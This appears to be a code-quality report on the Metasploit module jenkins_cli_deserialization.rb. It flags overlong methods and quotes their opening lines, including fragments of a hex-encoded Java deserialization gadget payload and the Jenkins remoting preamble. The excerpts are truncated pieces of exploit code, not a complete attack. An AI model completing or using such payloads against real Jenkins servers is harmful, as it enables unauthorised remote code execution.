rapid7/metasploit-framework

modules/exploits/linux/http/jenkins_cli_deserialization.rb

Summary

Maintainability: B (5 hrs)

Method build_obj has 56 lines of code (exceeds 25 allowed). Consider refactoring.
Open

  def build_obj(obj_data)
    payload_data = '00000000aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61'
    payload_data << '701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742'
    payload_data << 'e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e6375727265'
    payload_data << '6e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e5'
Severity: Major
Found in modules/exploits/linux/http/jenkins_cli_deserialization.rb - About 2 hrs to fix

Method initialize has 53 lines of code (exceeds 25 allowed). Consider refactoring.
Open

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Jenkins CLI Deserialization',
Severity: Major
Found in modules/exploits/linux/http/jenkins_cli_deserialization.rb - About 2 hrs to fix

Method execute_command has 29 lines of code (exceeds 25 allowed). Consider refactoring.
Open

  def execute_command(cmd, _opts = {})
    sess_uuid = SecureRandom.uuid
    sess_uri = normalize_uri(target_uri.path, 'cli')
    preamble = '<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
Severity: Minor
Found in modules/exploits/linux/http/jenkins_cli_deserialization.rb - About 1 hr to fix
